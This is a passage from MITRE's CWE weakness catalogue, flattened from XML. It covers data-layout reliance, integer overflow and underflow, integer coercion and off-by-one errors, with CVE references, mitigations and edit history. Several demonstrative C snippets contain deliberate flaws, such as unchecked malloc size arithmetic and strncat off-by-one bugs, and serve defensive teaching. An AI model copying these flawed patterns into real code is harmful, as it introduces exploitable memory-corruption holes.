2020-02-24 - updated Relationships - - Partial Comparison - - - - The software makes invalid assumptions about how protocol data or memory is organized at a lower level, resulting in unintended program behavior. - - When changing platforms or protocol versions, in-memory organization of data may change in unintended ways. For example, some architectures may place local variables A and B right next to each other with A on top; some may place them next to each other with B on top; and others may add some padding to each. The padding size may vary to ensure that each variable is aligned to a proper word size. - In protocol implementations, it is common to calculate an offset relative to another field to pick out a specific piece of data. Exceptional conditions, often involving new protocol versions, may add corner cases that change the data layout in an unusual way. The result can be that an implementation accesses an unintended field in the packet, treating data of one type as data of another type. - - - - - - - - - - - - Architecture and Design - - - Implementation - - - Low - - - Integrity - Confidentiality - Modify Memory - Read Memory - Can result in unintended modifications or exposure of sensitive memory. - - - - - Implementation - Architecture and Design - In flat address space situations, never allow computing memory addresses as offsets from another memory address. - - - Architecture and Design - Fully specify protocol layout unambiguously, providing a structured grammar (e.g., a compilable yacc grammar). - - - Testing - Testing: Test that the implementation properly handles each case in the protocol grammar. - - - - - In this example function, the memory address of variable b is derived by adding 1 to the address of variable a. This derived address is then used to assign the value 0 to b. - - void example() {char a;char b;*(&a + 1) = 0;} - - Here, b may not be one byte past a. It may be one byte in front of a. Or, they may have three bytes between them because they are aligned on 32-bit boundaries. - - - - - Reliance on data layout - - - - - - - - - CLASP - 2006-07-19 - - - Eric Dalci - Cigital - 2008-07-01 - updated Time_of_Introduction - - - CWE Content Team - MITRE - 2008-09-08 - updated Applicable_Platforms, Common_Consequences, Relationships, Other_Notes, Taxonomy_Mappings - - - CWE Content Team - MITRE - 2009-03-10 - updated Relationships - - - CWE Content Team - MITRE - 2009-10-29 - updated Common_Consequences - - - CWE Content Team - MITRE - 2011-03-29 - updated Common_Consequences - - - CWE Content Team - MITRE - 2011-06-01 - updated Common_Consequences - - - CWE Content Team - MITRE - 2012-05-11 - updated References, Relationships - - - CWE Content Team - MITRE - 2012-10-30 - updated Potential_Mitigations - - - CWE Content Team - MITRE - 2014-06-23 - updated Description, Other_Notes - - - CWE Content Team - MITRE - 2014-07-30 - updated Demonstrative_Examples, Relationships - - - CWE Content Team - MITRE - 2019-01-03 - updated Description, Relationships - - - CWE Content Team - MITRE - 2021-03-15 - updated References - - Reliance on Data Layout - - - - The software performs a calculation that can produce an integer overflow or wraparound, when the logic assumes that the resulting value will always be larger than the original value. This can introduce other weaknesses when the calculation is used for resource management or execution control. - An integer overflow or wraparound occurs when an integer value is incremented to a value that is too large to store in the associated representation. When this occurs, the value may wrap to become a very small or negative number. While this may be intended behavior in circumstances that rely on wrapping, it can have security consequences if the wrap is unexpected. This is especially the case if the integer overflow can be triggered using user-supplied inputs. This becomes security-critical when the result is used to control looping, make a security decision, or determine the offset or size in behaviors such as memory allocation, copying, concatenation, etc. - - - - - - - - - - - - Implementation - - - Medium - - - Availability - DoS: Crash, Exit, or Restart - DoS: Resource Consumption (CPU) - DoS: Resource Consumption (Memory) - DoS: Instability - This weakness will generally lead to undefined behavior and therefore crashes. In the case of overflows involving loop index variables, the likelihood of infinite loops is also high. - - - Integrity - Modify Memory - If the value in question is important to data (as opposed to flow), simple data corruption has occurred. Also, if the wrap around results in other conditions such as buffer overflows, further memory corruption may occur. - - - Confidentiality - Availability - Access Control - Execute Unauthorized Code or Commands - Bypass Protection Mechanism - This weakness can sometimes trigger buffer overflows which can be used to execute arbitrary code. This is usually outside the scope of a program's implicit security policy. - - - - - Automated Static Analysis - This weakness can often be detected using automated static analysis tools. Many modern tools use data flow analysis or constraint-based techniques to minimize the number of false positives. - High - - - Black Box - Sometimes, evidence of this weakness can be detected using dynamic tools and techniques that interact with the software using large test suites with many diverse inputs, such as fuzz testing (fuzzing), robustness testing, and fault injection. The software's operation may slow down, but it should not become unstable, crash, or generate incorrect results. - Moderate - Without visibility into the code, black box methods may not be able to sufficiently distinguish this weakness from others, requiring follow-up manual methods to diagnose the underlying problem. - - - Manual Analysis - - This weakness can be detected using tools and techniques that require manual (human) analysis, such as penetration testing, threat modeling, and interactive tools that allow the tester to record and modify an active session. - Specifically, manual static analysis is useful for evaluating the correctness of allocation calculations. This can be useful for detecting overflow conditions (CWE-190) or similar weaknesses that might have serious security impacts on the program. - - High - These may be more effective than strictly automated techniques. This is especially the case with weaknesses that are related to design and business rules. - - - Automated Static Analysis - Binary or Bytecode - - According to SOAR, the following detection techniques may be useful: - - Highly cost effective: - - - Bytecode Weakness Analysis - including disassembler + source code weakness analysis - Binary Weakness Analysis - including disassembler + source code weakness analysis - - - - - High - - - Dynamic Analysis with Manual Results Interpretation - - According to SOAR, the following detection techniques may be useful: - - Cost effective for partial coverage: - - - Fuzz Tester - Framework-based Fuzzer - - - - - SOAR Partial - - - Manual Static Analysis - Source Code - - According to SOAR, the following detection techniques may be useful: - - Cost effective for partial coverage: - - - Manual Source Code Review (not inspections) - - - - - SOAR Partial - - - Automated Static Analysis - Source Code - - According to SOAR, the following detection techniques may be useful: - - Highly cost effective: - - - Source code Weakness Analyzer - Context-configured Source Code Weakness Analyzer - - - - - High - - - Architecture or Design Review - - According to SOAR, the following detection techniques may be useful: - - Highly cost effective: - - - Formal Methods / Correct-By-Construction - - - Cost effective for partial coverage: - - - Inspection (IEEE 1028 standard) (can apply to requirements, design, source code, etc.) - - - - - High - - - - - Requirements - Ensure that all protocols are strictly defined, such that all out-of-bounds behavior can be identified simply, and require strict conformance to the protocol. - - - Requirements - Language Selection - - Use a language that does not allow this weakness to occur or provides constructs that make this weakness easier to avoid. - If possible, choose a language or compiler that performs automatic bounds checking. - - - - Architecture and Design - Libraries or Frameworks - - Use a vetted library or framework that does not allow this weakness to occur or provides constructs that make this weakness easier to avoid. - Use libraries or frameworks that make it easier to handle numbers without unexpected consequences. - Examples include safe integer handling packages such as SafeInt (C++) or IntegerLib (C or C++). [REF-106] - - - - Implementation - Input Validation - - Perform input validation on any numeric input by ensuring that it is within the expected range. Enforce that the input meets both the minimum and maximum requirements for the expected range. - Use unsigned integers where possible. This makes it easier to perform validation for integer overflows. When signed integers are required, ensure that the range check includes minimum values as well as maximum values. - - - - Implementation - - Understand the programming language's underlying representation and how it interacts with numeric calculation (CWE-681). Pay close attention to byte size discrepancies, precision, signed/unsigned distinctions, truncation, conversion and casting between types, "not-a-number" calculations, and how the language handles numbers that are too large or too small for its underlying representation. [REF-7] - Also be careful to account for 32-bit, 64-bit, and other potential differences that may affect the numeric representation. - - - - Architecture and Design - For any security checks that are performed on the client side, ensure that these checks are duplicated on the server side, in order to avoid CWE-602. Attackers can bypass the client-side checks by modifying values after the checks have been performed, or by changing the client to remove the client-side checks entirely. Then, these modified values would be submitted to the server. - - - Implementation - Compilation or Build Hardening - Examine compiler warnings closely and eliminate problems with potential security implications, such as signed / unsigned mismatch in memory operations, or use of uninitialized variables. Even if the weakness is rarely exploitable, a single failure may lead to the compromise of the entire system. - - - - - The following image processing code allocates a table for images. - - img_t table_ptr; /*struct containing img data, 10kB each*/int num_imgs;...num_imgs = get_num_imgs();table_ptr = (img_t*)malloc(sizeof(img_t)*num_imgs);... - - This code intends to allocate a table of size num_imgs, however as num_imgs grows large, the calculation determining the size of the list will eventually overflow (CWE-190). This will result in a very small list to be allocated instead. If the subsequent code operates on the list as if it were num_imgs long, it may result in many types of out-of-bounds problems (CWE-119). - - - The following code excerpt from OpenSSH 3.3 demonstrates a classic case of integer overflow: - - nresp = packet_get_int();if (nresp > 0) {response = xmalloc(nresp*sizeof(char*));for (i = 0; i < nresp; i++) response[i] = packet_get_string(NULL);} - - If nresp has the value 1073741824 and sizeof(char*) has its typical value of 4, then the result of the operation nresp*sizeof(char*) overflows, and the argument to xmalloc() will be 0. Most malloc() implementations will happily allocate a 0-byte buffer, causing the subsequent loop iterations to overflow the heap buffer response. - - - Integer overflows can be complicated and difficult to detect. The following example is an attempt to show how an integer overflow may lead to undefined looping behavior: - - short int bytesRec = 0;char buf[SOMEBIGNUM]; - while(bytesRec < MAXGET) {bytesRec += getFromInput(buf+bytesRec);} - - In the above case, it is entirely possible that bytesRec may overflow, continuously creating a lower number than MAXGET and also overwriting the first MAXGET-1 bytes of buf. - - - In this example the method determineFirstQuarterRevenue is used to determine the first quarter revenue for an accounting/business application. The method retrieves the monthly sales totals for the first three months of the year, calculates the first quarter sales totals from the monthly sales totals, calculates the first quarter revenue based on the first quarter sales, and finally saves the first quarter revenue results to the database. - - #define JAN 1#define FEB 2#define MAR 3 - short getMonthlySales(int month) {...} - float calculateRevenueForQuarter(short quarterSold) {...} - int determineFirstQuarterRevenue() { - - - // Variable for sales revenue for the quarter - float quarterRevenue = 0.0f; - short JanSold = getMonthlySales(JAN); /* Get sales in January */short FebSold = getMonthlySales(FEB); /* Get sales in February */short MarSold = getMonthlySales(MAR); /* Get sales in March */ - - // Calculate quarterly total - short quarterSold = JanSold + FebSold + MarSold; - - // Calculate the total revenue for the quarter - quarterRevenue = calculateRevenueForQuarter(quarterSold); - saveFirstQuarterRevenue(quarterRevenue); - return 0; - } - - However, in this example the primitive type short int is used for both the monthly and the quarterly sales variables. In C the short int primitive type has a maximum value of 32768. This creates a potential integer overflow if the value for the three monthly sales adds up to more than the maximum value for the short int primitive type. An integer overflow can lead to data corruption, unexpected behavior, infinite loops and system crashes. To correct the situation the appropriate primitive type should be used, as in the example below, and/or provide some validation mechanism to ensure that the maximum value for the primitive type is not exceeded. - - ...float calculateRevenueForQuarter(long quarterSold) {...} - int determineFirstQuarterRevenue() { - ... - // Calculate quarterly total - long quarterSold = JanSold + FebSold + MarSold; - - // Calculate the total revenue for the quarter - quarterRevenue = calculateRevenueForQuarter(quarterSold); - ... - } - - Note that an integer overflow could also occur if the quarterSold variable has a primitive type long but the method calculateRevenueForQuarter has a parameter of type short. - - - - - CVE-2018-10887 - Chain: unexpected sign extension (CWE-194) leads to integer overflow (CWE-190), causing an out-of-bounds read (CWE-125) - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2018-10887 - - - CVE-2019-1010006 - Chain: compiler optimization (CWE-733) removes or modifies code used to detect integer overflow (CWE-190), allowing out-of-bounds write (CWE-787). - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-1010006 - - - CVE-2010-2753 - Chain: integer overflow leads to use-after-free - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2010-2753 - - - CVE-2005-1513 - Chain: integer overflow in securely-coded mail program leads to buffer overflow. In 2005, this was regarded as unrealistic to exploit, but in 2020, it was rediscovered to be easier to exploit due to evolutions of the technology. - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2005-1513 - - - CVE-2002-0391 - Integer overflow via a large number of arguments. - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2002-0391 - - - CVE-2002-0639 - Integer overflow in OpenSSH as listed in the demonstrative examples. - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2002-0639 - - - CVE-2005-1141 - Image with large width and height leads to integer overflow. - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2005-1141 - - - CVE-2005-0102 - Length value of -1 leads to allocation of 0 bytes and resultant heap overflow. - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2005-0102 - - - CVE-2004-2013 - Length value of -1 leads to allocation of 0 bytes and resultant heap overflow. - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2004-2013 - - - CVE-2017-1000121 - chain: unchecked message size metadata allows integer overflow (CWE-190) leading to buffer overflow (CWE-119). - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-1000121 - - - CVE-2013-1591 - Chain: an integer overflow (CWE-190) in the image size calculation causes an infinite loop (CWE-835) which sequentially allocates buffers without limits (CWE-1325) until the stack is full. - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2013-1591 - - - - Number Processing - Memory Management - Counters - - - - Integer overflow (wrap or wraparound) - - - Integer Overflow - - - Integer overflow - - - INT18-C - Evaluate integer expressions in a larger size before comparing or assigning to that size - CWE More Abstract - - - INT30-C - Ensure that unsigned integer operations do not wrap - CWE More Abstract - - - INT32-C - Ensure that operations on signed integers do not result in overflow - Imprecise - - - INT35-C - Evaluate integer expressions in a larger size before comparing or assigning to that size - - - MEM07-C - Ensure that the arguments to calloc(), when multiplied, do not wrap - CWE More Abstract - - - MEM35-C - Allocate sufficient memory for an object - - - 3 - Integer Overflows - - - SFP1 - Glitch in computation - - - - - - - - - - - - - - - - Integer overflows can be primary to buffer overflows. - "Integer overflow" is sometimes used to cover several types of errors, including signedness errors, or buffer overflows that involve manipulation of integer data types instead of characters. Part of the confusion results from the fact that 0xffffffff is -1 in a signed context. Other confusion also arises because of the role that integer overflows have in chains. - - - - PLOVER - 2006-07-19 - - - CWE Content Team - MITRE - 2008-09-08 - updated Common_Consequences, Relationships, Relationship_Notes, Taxonomy_Mappings, Terminology_Notes - - - CWE Content Team - MITRE - 2008-10-14 - updated Common_Consequences, Description, Potential_Mitigations, Terminology_Notes - - - CWE Content Team - MITRE - 2008-11-24 - updated Relationships, Taxonomy_Mappings - - - CWE Content Team - MITRE - 2009-01-12 - updated Description, Name - - - CWE Content Team - MITRE - 2009-05-27 - updated Demonstrative_Examples - - - CWE Content Team - MITRE - 2009-10-29 - updated Relationships - - - CWE Content Team - MITRE - 2010-02-16 - updated Applicable_Platforms, Detection_Factors, Functional_Areas, Observed_Examples, Potential_Mitigations, References, Related_Attack_Patterns, Relationships, Taxonomy_Mappings, Terminology_Notes - - - CWE Content Team - MITRE - 2010-04-05 - updated Demonstrative_Examples, Detection_Factors, Potential_Mitigations, References, Related_Attack_Patterns - - - CWE Content Team - MITRE - 2010-06-21 - updated Common_Consequences, Potential_Mitigations, References - - - CWE Content Team - MITRE - 2010-09-27 - updated Observed_Examples, Potential_Mitigations - - - CWE Content Team - MITRE - 2011-06-01 - updated Common_Consequences - - - CWE Content Team - MITRE - 2011-06-27 - updated Relationships - - - CWE Content Team - MITRE - 2011-09-13 - updated Potential_Mitigations, References, Relationships, Taxonomy_Mappings - - - CWE Content Team - MITRE - 2012-05-11 - updated Common_Consequences, Demonstrative_Examples, References, Relationships - - - CWE Content Team - MITRE - 2012-10-30 - updated Potential_Mitigations - - - CWE Content Team - MITRE - 2013-07-17 - updated References - - - CWE Content Team - MITRE - 2014-07-30 - updated Detection_Factors, Relationships, Taxonomy_Mappings - - - CWE Content Team - MITRE - 2015-12-07 - updated Relationships - - - CWE Content Team - MITRE - 2017-01-19 - updated Relationships - - - CWE Content Team - MITRE - 2017-11-08 - updated Functional_Areas, Observed_Examples, References, Taxonomy_Mappings - - - CWE Content Team - MITRE - 2018-03-27 - updated References - - - CWE Content Team - MITRE - 2019-01-03 - updated Relationships - - - CWE Content Team - MITRE - 2019-09-19 - updated Relationships - - - CWE Content Team - MITRE - 2020-02-24 - updated Relationships - - - CWE Content Team - MITRE - 2020-06-25 - updated Observed_Examples - - - CWE Content Team - MITRE - 2020-08-20 - updated Relationships - - - CWE Content Team - MITRE - 2020-12-10 - updated Observed_Examples - - - CWE Content Team - MITRE - 2021-03-15 - updated Potential_Mitigations - - - CWE Content Team - MITRE - 2021-07-20 - updated Relationships - - Integer Overflow (Wrap or Wraparound) - - - - The product subtracts one value from another, such that the result is less than the minimum allowable integer value, which produces a value that is not equal to the correct result. - This can happen in signed and unsigned cases. - - - - - - - - - - - - - Integer underflow - - "Integer underflow" is sometimes used to identify signedness errors in which an originally positive number becomes negative as a result of subtraction. However, there are cases of bad subtraction in which unsigned integers are involved, so it's not always a signedness issue. - "Integer underflow" is occasionally used to describe array index errors in which the index is negative. - - - - - - Implementation - - - - - Availability - DoS: Crash, Exit, or Restart - DoS: Resource Consumption (CPU) - DoS: Resource Consumption (Memory) - DoS: Instability - This weakness will generally lead to undefined behavior and therefore crashes. In the case of overflows involving loop index variables, the likelihood of infinite loops is also high. - - - Integrity - Modify Memory - If the value in question is important to data (as opposed to flow), simple data corruption has occurred. Also, if the wrap around results in other conditions such as buffer overflows, further memory corruption may occur. - - - Confidentiality - Availability - Access Control - Execute Unauthorized Code or Commands - Bypass Protection Mechanism - This weakness can sometimes trigger buffer overflows which can be used to execute arbitrary code. This is usually outside the scope of a program's implicit security policy. - - - - - The following example subtracts from a 32 bit signed integer. - - #include <stdio.h>#include <stdbool.h>main (void){int i;i = -2147483648;i = i - 1;return 0;} - - - The example has an integer underflow. The value of i is already at the lowest negative value possible, so after subtracting 1, the new value of i is 2147483647. - - - This code performs a stack allocation based on a length calculation. - - - int a = 5, b = 6; - size_t len = a - b; - char buf[len]; // Just blows up the stack - - } - - Since a and b are declared as signed ints, the "a - b" subtraction gives a negative result (-1). However, since len is declared to be unsigned, len is cast to an extremely large positive number (on 32-bit systems - 4294967295). As a result, the buffer buf[len] declaration uses an extremely large size to allocate on the stack, very likely more than the entire computer's memory space. - Miscalculations usually will not be so obvious. The calculation will either be complicated or the result of an attacker's input to attain the negative value. - - - - - CVE-2004-0816 - Integer underflow in firewall via malformed packet. - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2004-0816 - - - CVE-2004-1002 - Integer underflow by packet with invalid length. - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2004-1002 - - - CVE-2005-0199 - Long input causes incorrect length calculation. - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2005-0199 - - - CVE-2005-1891 - Malformed icon causes integer underflow in loop counter variable. - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2005-1891 - - - - - Integer underflow (wrap or wraparound) - - - SFP1 - Glitch in computation - - - INT30-C - Ensure that unsigned integer operations do not wrap - Imprecise - - - INT32-C - Ensure that operations on signed integers do not result in overflow - Imprecise - - - - - - - Under-studied. - - - - PLOVER - 2006-07-19 - - - Eric Dalci - Cigital - 2008-07-01 - updated Demonstrative_Example - - - CWE Content Team - MITRE - 2008-09-08 - updated Alternate_Terms, Applicable_Platforms, Relationships, Taxonomy_Mappings - - - CWE Content Team - MITRE - 2008-10-14 - updated Description - - - CWE Content Team - MITRE - 2009-05-27 - updated Demonstrative_Examples - - - CWE Content Team - MITRE - 2011-06-01 - updated Common_Consequences - - - CWE Content Team - MITRE - 2011-06-27 - updated Common_Consequences - - - CWE Content Team - MITRE - 2012-05-11 - updated Common_Consequences, References, Relationships - - - CWE Content Team - MITRE - 2014-07-30 - updated Demonstrative_Examples, Relationships, Taxonomy_Mappings - - - CWE Content Team - MITRE - 2015-12-07 - updated Relationships - - - CWE Content Team - MITRE - 2017-11-08 - updated Taxonomy_Mappings - - - CWE Content Team - MITRE - 2019-01-03 - updated Relationships - - - CWE Content Team - MITRE - 2020-02-24 - updated Relationships - - - CWE Content Team - MITRE - 2021-03-15 - updated Demonstrative_Examples - - - - - Integer coercion refers to a set of flaws pertaining to the type casting, extension, or truncation of primitive data types. - Several flaws fall under the category of integer coercion errors. For the most part, these errors in and of themselves result only in availability and data integrity issues. However, in some circumstances, they may result in other, more complicated security related flaws, such as buffer overflow conditions. - - - - - - - - - - - - Implementation - - - Medium - - - Availability - DoS: Resource Consumption (CPU) - DoS: Resource Consumption (Memory) - DoS: Crash, Exit, or Restart - Integer coercion often leads to undefined states of execution resulting in infinite loops or crashes. - - - Integrity - Confidentiality - Availability - Execute Unauthorized Code or Commands - In some cases, integer coercion errors can lead to exploitable buffer overflow conditions, resulting in the execution of arbitrary code. - - - Integrity - Other - Other - Integer coercion errors result in an incorrect value being stored for the variable in question. - - - - - Requirements - A language which throws exceptions on ambiguous data casts might be chosen. - - - Architecture and Design - Design objects and program flow such that multiple or complex casts are unnecessary - - - Implementation - Ensure that any data type casting that you must used is entirely understood in order to reduce the plausibility of error in use. - - - - - The following code is intended to read an incoming packet from a socket and extract one or more headers. - - DataPacket *packet;int numHeaders;PacketHeader *headers; - sock=AcceptSocketConnection();ReadPacket(packet, sock);numHeaders =packet->headers; - if (numHeaders > 100) {ExitError("too many headers!");}headers = malloc(numHeaders * sizeof(PacketHeader);ParsePacketHeaders(packet, headers); - - The code performs a check to make sure that the packet does not contain too many headers. However, numHeaders is defined as a signed int, so it could be negative. If the incoming packet specifies a value such as -3, then the malloc calculation will generate a negative number (say, -300 if each header can be a maximum of 100 bytes). When this result is provided to malloc(), it is first converted to a size_t type. This conversion then produces a large value such as 4294966996, which may cause malloc() to fail or to allocate an extremely large amount of memory (CWE-195). With the appropriate negative numbers, an attacker could trick malloc() into using a very small positive number, which then allocates a buffer that is much smaller than expected, potentially leading to a buffer overflow. - - - The following code reads a maximum size and performs validation on that size. It then performs a strncpy, assuming it will not exceed the boundaries of the array. While the use of "short s" is forced in this particular example, short int's are frequently used within real-world code, such as code that processes structured data. - - int GetUntrustedInt () {return(0x0000FFFF);} - void main (int argc, char **argv) { - char path[256];char *input;int i;short s;unsigned int sz; - i = GetUntrustedInt();s = i;/* s is -1 so it passes the safety check - CWE-697 */if (s > 256) {DiePainfully("go away!\n");} - /* s is sign-extended and saved in sz */sz = s; - /* output: i=65535, s=-1, sz=4294967295 - your mileage may vary */printf("i=%d, s=%d, sz=%u\n", i, s, sz); - input = GetUserInput("Enter pathname:"); - /* strncpy interprets s as unsigned int, so it's treated as MAX_INT(CWE-195), enabling buffer overflow (CWE-119) */strncpy(path, input, s);path[255] = '\0'; /* don't want CWE-170 */printf("Path is: %s\n", path); - } - - This code first exhibits an example of CWE-839, allowing "s" to be a negative number. When the negative short "s" is converted to an unsigned integer, it becomes an extremely large positive integer. When this converted integer is used by strncpy() it will lead to a buffer overflow (CWE-119). - - - - - Integer coercion error - - - INT02-C - Understand integer conversion rules - - - INT05-C - Do not use input functions to convert character data if they cannot handle all possible inputs - - - INT31-C - Ensure that integer conversions do not result in lost or misinterpreted data - Exact - - - - - - - - - Within C, it might be that "coercion" is semantically different than "casting", possibly depending on whether the programmer directly specifies the conversion, or if the compiler does it implicitly. This has implications for the presentation of this entry and others, such as CWE-681, and whether there is enough of a difference for these entries to be split. - - - - CLASP - 2006-07-19 - - - CWE Content Team - MITRE - 2008-09-08 - updated Applicable_Platforms, Common_Consequences, Maintenance_Notes, Relationships, Other_Notes, Taxonomy_Mappings - - - CWE Content Team - MITRE - 2008-11-24 - updated Relationships, Taxonomy_Mappings - - - CWE Content Team - MITRE - 2009-12-28 - updated Description, Other_Notes - - - CWE Content Team - MITRE - 2010-04-05 - updated Demonstrative_Examples - - - CWE Content Team - MITRE - 2011-06-01 - updated Common_Consequences - - - CWE Content Team - MITRE - 2011-09-13 - updated Relationships, Taxonomy_Mappings - - - CWE Content Team - MITRE - 2012-05-11 - updated Demonstrative_Examples, References - - - CWE Content Team - MITRE - 2012-10-30 - updated Potential_Mitigations - - - CWE Content Team - MITRE - 2017-11-08 - updated Relationships, Taxonomy_Mappings, Type - - - CWE Content Team - MITRE - 2019-01-03 - updated Relationships - - - CWE Content Team - MITRE - 2020-02-24 - updated Relationships - - - CWE Content Team - MITRE - 2021-03-15 - updated Demonstrative_Examples, Maintenance_Notes, References - - - - - A product calculates or uses an incorrect maximum or minimum value that is 1 more, or 1 less, than the correct value. - - - - - - - - - - - - - off-by-five - An "off-by-five" error was reported for sudo in 2002 (CVE-2002-0184), but that is more like a "length calculation" error. - - - - - Implementation - - - - - Availability - DoS: Crash, Exit, or Restart - DoS: Resource Consumption (CPU) - DoS: Resource Consumption (Memory) - DoS: Instability - This weakness will generally lead to undefined behavior and therefore crashes. In the case of overflows involving loop index variables, the likelihood of infinite loops is also high. - - - Integrity - Modify Memory - If the value in question is important to data (as opposed to flow), simple data corruption has occurred. Also, if the wrap around results in other conditions such as buffer overflows, further memory corruption may occur. - - - Confidentiality - Availability - Access Control - Execute Unauthorized Code or Commands - Bypass Protection Mechanism - This weakness can sometimes trigger buffer overflows which can be used to execute arbitrary code. This is usually outside the scope of a program's implicit security policy. - - - - - Implementation - When copying character arrays or using character manipulation methods, the correct size parameter must be used to account for the null terminator that needs to be added at the end of the array. Some examples of functions susceptible to this weakness in C include strcpy(), strncpy(), strcat(), strncat(), printf(), sprintf(), scanf() and sscanf(). - - - - - The following code allocates memory for a maximum number of widgets. It then gets a user-specified number of widgets, making sure that the user does not request too many. It then initializes the elements of the array using InitializeWidget(). Because the number of widgets can vary for each request, the code inserts a NULL pointer to signify the location of the last widget. - - int i;unsigned int numWidgets;Widget **WidgetList; - numWidgets = GetUntrustedSizeValue();if ((numWidgets == 0) || (numWidgets > MAX_NUM_WIDGETS)) {ExitError("Incorrect number of widgets requested!");}WidgetList = (Widget **)malloc(numWidgets * sizeof(Widget *));printf("WidgetList ptr=%p\n", WidgetList);for(i=0; i<numWidgets; i++) {WidgetList[i] = InitializeWidget();}WidgetList[numWidgets] = NULL;showWidgets(WidgetList); - - However, this code contains an off-by-one calculation error (CWE-193). It allocates exactly enough space to contain the specified number of widgets, but it does not include the space for the NULL pointer. As a result, the allocated buffer is smaller than it is supposed to be (CWE-131). So if the user ever requests MAX_NUM_WIDGETS, there is an out-of-bounds write (CWE-787) when the NULL is assigned. Depending on the environment and compilation settings, this could cause memory corruption. - - - In this example, the code does not account for the terminating null character, and it writes one byte beyond the end of the buffer. - The first call to strncat() appends up to 20 characters plus a terminating null character to fullname[]. There is plenty of allocated space for this, and there is no weakness associated with this first call. However, the second call to strncat() potentially appends another 20 characters. The code does not account for the terminating null character that is automatically added by strncat(). This terminating null character would be written one byte beyond the end of the fullname[] buffer. Therefore an off-by-one error exists with the second strncat() call, as the third argument should be 19. - - char firstname[20];char lastname[20];char fullname[40];fullname[0] = '\0';strncat(fullname, firstname, 20);strncat(fullname, lastname, 20); - - When using a function like strncat() one must leave a free byte at the end of the buffer for a terminating null character, thus avoiding the off-by-one weakness. Additionally, the last argument to strncat() is the number of characters to append, which must be less than the remaining space in the buffer. Be careful not to just use the total size of the buffer. - - char firstname[20];char lastname[20];char fullname[40];fullname[0] = '\0';strncat(fullname, firstname, sizeof(fullname)-strlen(fullname)-1);strncat(fullname, lastname, sizeof(fullname)-strlen(fullname)-1); - - - - The Off-by-one error can also be manifested when reading characters from a character array within a for loop that has an incorrect continuation condition. - - #define PATH_SIZE 60 - char filename[PATH_SIZE]; - for(i=0; i<=PATH_SIZE; i++) { - - char c = getc();if (c == 'EOF') {filename[i] = '\0';} - filename[i] = getc(); - } - - In this case, the correct continuation condition is shown below. - - for(i=0; i<PATH_SIZE; i++) {... - - - - As another example the Off-by-one error can occur when using the sprintf library function to copy a string variable to a formatted string variable and the original string variable comes from an untrusted source. As in the following example where a local function, setFilename is used to store the value of a filename to a database but first uses sprintf to format the filename. The setFilename function includes an input parameter with the name of the file that is used as the copy source in the sprintf function. The sprintf function will copy the file name to a char array of size 20 and specifies the format of the new variable as 16 characters followed by the file extension .dat. - - int setFilename(char *filename) {char name[20];sprintf(name, "%16s.dat", filename);int success = saveFormattedFilenameToDB(name);return success;} - - However this will cause an Off-by-one error if the original filename is exactly 16 characters or larger because the format of 16 characters with the file extension is exactly 20 characters and does not take into account the required null terminator that will be placed at the end of the string. - - - - - CVE-2003-0252 - Off-by-one error allows remote attackers to cause a denial of service and possibly execute arbitrary code via requests that do not contain newlines. - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2003-0252 - - - CVE-2001-1391 - Off-by-one vulnerability in driver allows users to modify kernel memory. - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2001-1391 - - - CVE-2002-0083 - Off-by-one error allows local users or remote malicious servers to gain privileges. - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2002-0083 - - - CVE-2002-0653 - Off-by-one buffer overflow in function usd by server allows local users to execute arbitrary code as the server user via .htaccess files with long entries. - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2002-0653 - - - CVE-2002-0844 - Off-by-one buffer overflow in version control system allows local users to execute arbitrary code. - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2002-0844 - - - CVE-1999-1568 - Off-by-one error in FTP server allows a remote attacker to cause a denial of service (crash) via a long PORT command. - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-1999-1568 - - - CVE-2004-0346 - Off-by-one buffer overflow in FTP server allows local users to gain privileges via a 1024 byte RETR command. - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2004-0346 - - - CVE-2004-0005 - Multiple buffer overflows in chat client allow remote attackers to cause a denial of service and possibly execute arbitrary code. - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2004-0005 - - - CVE-2003-0356 - Multiple off-by-one vulnerabilities in product allow remote attackers to cause a denial of service and possibly execute arbitrary code. - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2003-0356 - - - CVE-2001-1496 - Off-by-one buffer overflow in server allows remote attackers to cause a denial of service and possibly execute arbitrary code. - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2001-1496 - - - CVE-2004-0342 - This is an interesting example that might not be an off-by-one. - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2004-0342 - - - CVE-2001-0609 - An off-by-one enables a terminating null to be overwritten, which causes 2 strings to be merged and enable a format string. - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2001-0609 - - - CVE-2002-1745 - Off-by-one error allows source code disclosure of files with 4 letter extensions that match an accepted 3-letter extension. - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2002-1745 - - - CVE-2002-1816 - Off-by-one buffer overflow. - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2002-1816 - - - CVE-2002-1721 - Off-by-one error causes an snprintf call to overwrite a critical internal variable with a null value. - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2002-1721 - - - CVE-2003-0466 - Off-by-one error in function used in many products leads to a buffer overflow during pathname management, as demonstrated using multiple commands in an FTP server. - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2003-0466 - - - CVE-2003-0625 - 